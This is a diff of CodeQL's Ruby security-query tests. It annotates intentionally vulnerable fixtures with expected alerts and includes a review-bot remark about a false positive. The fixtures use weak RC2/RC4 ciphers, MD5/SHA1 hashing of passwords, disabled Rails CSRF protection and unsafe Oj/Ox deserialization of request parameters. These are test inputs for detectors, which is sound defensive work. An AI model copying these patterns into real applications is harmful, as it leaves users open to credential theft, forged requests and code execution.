-OpenSSL::Cipher::RC2.new +OpenSSL::Cipher::RC2.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC2.new 'ecb' +OpenSSL::Cipher::RC2.new 'ecb' # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new +OpenSSL::Cipher::RC4.new # $ Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new '40' +OpenSSL::Cipher::RC4.new '40' # $ 
Alert[rb/weak-cryptographic-algorithm] # BAD: weak encryption algorithm -OpenSSL::Cipher::RC4.new 'hmac-md5' +OpenSSL::Cipher::RC4.new 'hmac-md5' # $ Alert[rb/weak-cryptographic-algorithm] Digest::MD5.hexdigest('foo') # OK: don't report hash algorithm even if it is weak Digest::SHA256.hexdigest('foo') # GOOD: strong hash algorithm diff --git a/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb b/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb index cff4263c40d8..e1d5eb2645a1 100644 --- a/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb +++ b/ruby/ql/test/query-tests/security/cwe-327/weak_hashing.rb @@ -1,16 +1,16 @@ require 'openssl' -password = "abcde" -username = "some_user" +password = "abcde" # $ Source[rb/weak-sensitive-data-hashing] +username = "some_user" # $ Source[rb/weak-sensitive-data-hashing] some_data = "foo" x = password Digest::MD5.hexdigest(some_data) # OK: input is not sensitive Digest::SHA256.hexdigest(password) # OK: strong hash algorithm -Digest::MD5.hexdigest(password) # BAD: weak hash function used for sensitive data -OpenSSL::Digest.digest('SHA1', password) # BAD: weak hash function used for sensitive data -Digest::MD5.hexdigest(username) # BAD: weak hash function used for sensitive data -Digest::MD5.hexdigest(x) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(password) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +OpenSSL::Digest.digest('SHA1', password) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +Digest::MD5.hexdigest(username) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] +Digest::MD5.hexdigest(x) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] def get_safe_data() return "hello" 
@@ -21,13 +21,13 @@ def get_password() end Digest::MD5.hexdigest(get_safe_data()) # OK: input is not sensitive -Digest::MD5.hexdigest(get_password()) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(get_password()) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] some_hash = {password: "changeme", foo: "bar"} Digest::MD5.hexdigest(some_hash[:foo]) # OK: input is not sensitive -Digest::MD5.hexdigest(some_hash[:password]) # BAD: weak hash function used for sensitive data +Digest::MD5.hexdigest(some_hash[:password]) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] -def a_method(safe_data, password_param) +def a_method(safe_data, password_param) # $ Source[rb/weak-sensitive-data-hashing] Digest::MD5.hexdigest(safe_data) # OK: input is not sensitive - Digest::MD5.hexdigest(password_param) # BAD: weak hash function used for sensitive data + Digest::MD5.hexdigest(password_param) # BAD: weak hash function used for sensitive data # $ Alert[rb/weak-sensitive-data-hashing] end diff --git a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref index 5dc5050b63e8..7e422be7bf57 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref +++ b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionDisabled.qlref @@ -1 +1,2 @@ -queries/security/cwe-352/CSRFProtectionDisabled.ql \ No newline at end of file +query: queries/security/cwe-352/CSRFProtectionDisabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref index 8e9e894fe518..a47a9b3e99a4 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref 
+++ b/ruby/ql/test/query-tests/security/cwe-352/CSRFProtectionNotEnabled.qlref @@ -1 +1,2 @@ -queries/security/cwe-352/CSRFProtectionNotEnabled.ql \ No newline at end of file +query: queries/security/cwe-352/CSRFProtectionNotEnabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb index 8cbf31529c15..fffa5f05db64 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/alternative_root_controller.rb @@ -1,3 +1,3 @@ class AlternativeRootController < ActionController::Base # BAD: no protect_from_forgery call -end \ No newline at end of file +end # $ Alert[rb/csrf-protection-not-enabled] \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb index 6ff599938e81..0d98c535a41b 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/application_controller.rb @@ -2,7 +2,7 @@ class ApplicationController < ActionController::Base # BAD: `protect_from_forgery` without `with: :exception` can expose an # application to CSRF attacks in some circumstances - protect_from_forgery + protect_from_forgery # $ Alert[rb/csrf-protection-disabled] before_action authz_guard diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb index 596a7b0108ff..1b54c332cd27 100644 
--- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/app/controllers/users_controller.rb @@ -1,7 +1,7 @@ class UsersController < ApplicationController # BAD: Disabling forgery protection may open the application to CSRF attacks - skip_before_action :verify_authenticity_token + skip_before_action :verify_authenticity_token # $ Alert[rb/csrf-protection-disabled] def change_email user = current_user diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb index 02b349a16304..5d455ebe347a 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/application.rb @@ -13,6 +13,6 @@ class Application < Rails::Application config.load_defaults 5.1 # BAD: Disabling forgery protection may open the application to CSRF attacks - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end end diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb index a61bc6382b6f..968227d5e330 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/development.rb @@ -2,5 +2,5 @@ # Settings specified here will take precedence over those in config/application.rb. # GOOD: disabling CSRF protection in the development environment should not be flagged - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end 
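Review bot: In `config/environments/development.rb` the added `# $ Alert[rb/csrf-protection-disabled]` sits directly under the existing comment `# GOOD: disabling CSRF protection in the development environment should not be flagged`, so the test now records a known false positive as an ordinary expected result. I would mark it as such, `config.action_controller.allow_forgery_protection = false # $ SPURIOUS: Alert[rb/csrf-protection-disabled]`, or reword the comment to say the query currently flags this line. Otherwise a later precision fix that stops flagging development environments will look like a test regression rather than the intended improvement.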
diff --git a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb index 1a80e8503a60..384097fccf05 100644 --- a/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb +++ b/ruby/ql/test/query-tests/security/cwe-352/railsapp/config/environments/production.rb @@ -2,5 +2,5 @@ # Settings specified here will take precedence over those in config/application.rb. # BAD: Disabling forgery protection may open the application to CSRF attacks - config.action_controller.allow_forgery_protection = false + config.action_controller.allow_forgery_protection = false # $ Alert[rb/csrf-protection-disabled] end diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb index 3ec21d778c15..ffaa4107231b 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/OjGlobalOptions.rb @@ -10,7 +10,7 @@ def route0 # BAD - the safe mode set globally is overridden with an unsafe mode passed as # a call argument def route1 - json_data = params[:key] - object = Oj.load json_data, mode: :object + json_data = params[:key] # $ Source + object = Oj.load json_data, mode: :object # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected index 44f54744e4b1..9d220826b1cd 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.expected 
@@ -1,3 +1,5 @@ +#select +| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | edges | OjGlobalOptions.rb:13:5:13:13 | json_data | OjGlobalOptions.rb:14:22:14:30 | json_data | provenance | | | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:13:17:13:28 | ...[...] | provenance | | @@ -8,5 +10,3 @@ nodes | OjGlobalOptions.rb:13:17:13:28 | ...[...] | semmle.label | ...[...] | | OjGlobalOptions.rb:14:22:14:30 | json_data | semmle.label | json_data | subpaths -#select -| OjGlobalOptions.rb:14:22:14:30 | json_data | OjGlobalOptions.rb:13:17:13:22 | call to params | OjGlobalOptions.rb:14:22:14:30 | json_data | Unsafe deserialization depends on a $@. | OjGlobalOptions.rb:13:17:13:22 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/oj-global-options/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb index 02adc167dab1..d43d9cb9173c 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/OxGlobalOptions.rb 
@@ -3,8 +3,8 @@ class UsersController < ActionController::Base # BAD - Ox.load is unsafe when the mode :object is set globally def route0 - xml_data = params[:key] - object = Ox.load xml_data + xml_data = params[:key] # $ Source + object = Ox.load xml_data # $ Alert end # GOOD - the unsafe mode set globally is overridden with an insecure mode passed as diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected index 4fa7c85df052..a7fd344d2865 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.expected @@ -1,3 +1,5 @@ +#select +| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | edges | OxGlobalOptions.rb:6:5:6:12 | xml_data | OxGlobalOptions.rb:7:22:7:29 | xml_data | provenance | | | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:6:16:6:27 | ...[...] | provenance | | @@ -8,5 +10,3 @@ nodes | OxGlobalOptions.rb:6:16:6:27 | ...[...] | semmle.label | ...[...] | | OxGlobalOptions.rb:7:22:7:29 | xml_data | semmle.label | xml_data | subpaths -#select -| OxGlobalOptions.rb:7:22:7:29 | xml_data | OxGlobalOptions.rb:6:16:6:21 | call to params | OxGlobalOptions.rb:7:22:7:29 | xml_data | Unsafe deserialization depends on a $@. | OxGlobalOptions.rb:6:16:6:21 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref index 55f7c440b46e..12e3c7a9b6ca 100644 
--- a/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref +++ b/ruby/ql/test/query-tests/security/cwe-502/ox-global-options/UnsafeDeserialization.qlref @@ -1 +1,2 @@ -queries/security/cwe-502/UnsafeDeserialization.ql +query: queries/security/cwe-502/UnsafeDeserialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected index b99b2e7c7810..b20b5e8b30e6 100644 --- a/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected +++ b/ruby/ql/test/query-tests/security/cwe-502/unsafe-deserialization/UnsafeDeserialization.expected 
@@ -1,3 +1,31 @@ +#select +| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | +| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | +| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | +| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | +| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | +| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | +| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | +| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | +| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:167:24:167:32 | call to read | value from stdin | +| UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | UnsafeDeserialization.rb:170:24:170:27 | call to gets | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:170:24:170:27 | call to gets | value from stdin | +| UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | value from stdin | edges | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | provenance | | | UnsafeDeserialization.rb:11:23:11:50 | call to decode64 | UnsafeDeserialization.rb:11:5:11:19 | serialized_data | provenance | | 
@@ -129,31 +157,3 @@ nodes | UnsafeDeserialization.rb:170:24:170:27 | call to gets | semmle.label | call to gets | | UnsafeDeserialization.rb:173:24:173:32 | call to readlines | semmle.label | call to readlines | subpaths -#select -| UnsafeDeserialization.rb:12:27:12:41 | serialized_data | UnsafeDeserialization.rb:11:39:11:44 | call to params | UnsafeDeserialization.rb:12:27:12:41 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:11:39:11:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:18:30:18:44 | serialized_data | UnsafeDeserialization.rb:17:39:17:44 | call to params | UnsafeDeserialization.rb:18:30:18:44 | serialized_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:17:39:17:44 | call to params | user-provided value | -| UnsafeDeserialization.rb:24:24:24:32 | json_data | UnsafeDeserialization.rb:23:17:23:22 | call to params | UnsafeDeserialization.rb:24:24:24:32 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:23:17:23:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:30:27:30:35 | json_data | UnsafeDeserialization.rb:29:17:29:22 | call to params | UnsafeDeserialization.rb:30:27:30:35 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:29:17:29:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:42:24:42:32 | yaml_data | UnsafeDeserialization.rb:41:17:41:22 | call to params | UnsafeDeserialization.rb:42:24:42:32 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:41:17:41:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:54:22:54:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:54:22:54:30 | json_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:55:22:55:30 | json_data | UnsafeDeserialization.rb:53:17:53:22 | call to params | UnsafeDeserialization.rb:55:22:55:30 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:53:17:53:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:70:23:70:31 | json_data | UnsafeDeserialization.rb:60:17:60:22 | call to params | UnsafeDeserialization.rb:70:23:70:31 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:60:17:60:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:82:28:82:36 | json_data | UnsafeDeserialization.rb:81:16:81:21 | call to params | UnsafeDeserialization.rb:82:28:82:36 | json_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:81:16:81:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:88:26:88:33 | xml_data | UnsafeDeserialization.rb:87:15:87:20 | call to params | UnsafeDeserialization.rb:88:26:88:33 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:87:15:87:20 | call to params | user-provided value | -| UnsafeDeserialization.rb:94:22:94:29 | xml_data | UnsafeDeserialization.rb:93:16:93:21 | call to params | UnsafeDeserialization.rb:94:22:94:29 | xml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:93:16:93:21 | call to params | user-provided value | -| UnsafeDeserialization.rb:110:34:110:36 | xml | UnsafeDeserialization.rb:109:11:109:16 | call to params | UnsafeDeserialization.rb:110:34:110:36 | xml | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:109:11:109:16 | call to params | user-provided value | -| UnsafeDeserialization.rb:116:25:116:33 | yaml_data | UnsafeDeserialization.rb:115:17:115:22 | call to params | UnsafeDeserialization.rb:116:25:116:33 | yaml_data | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:115:17:115:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:123:25:123:33 | yaml_data | UnsafeDeserialization.rb:122:17:122:22 | call to params | UnsafeDeserialization.rb:123:25:123:33 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:122:17:122:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:138:32:138:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:138:32:138:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:139:37:139:45 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:139:37:139:45 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:140:32:140:40 | yaml_data | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:140:32:140:40 | yaml_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:142:14:142:33 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:143:14:143:43 | call to to_ruby | Unsafe deserialization depends on a $@. 
| UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | UnsafeDeserialization.rb:137:17:137:22 | call to params | UnsafeDeserialization.rb:144:14:144:48 | call to to_ruby | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:137:17:137:22 | call to params | user-provided value | -| UnsafeDeserialization.rb:150:30:150:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:150:30:150:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:151:30:151:39 | plist_data | UnsafeDeserialization.rb:149:18:149:23 | call to params | UnsafeDeserialization.rb:151:30:151:39 | plist_data | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:149:18:149:23 | call to params | user-provided value | -| UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | UnsafeDeserialization.rb:161:24:161:34 | call to read | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:161:24:161:34 | call to read | value from stdin | -| UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | UnsafeDeserialization.rb:164:24:164:33 | call to gets | Unsafe deserialization depends on a $@. | UnsafeDeserialization.rb:164:24:164:33 | call to gets | value from stdin | -| UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | UnsafeDeserialization.rb:167:24:167:32 | call to read | Unsafe deserialization depends on a $@. 
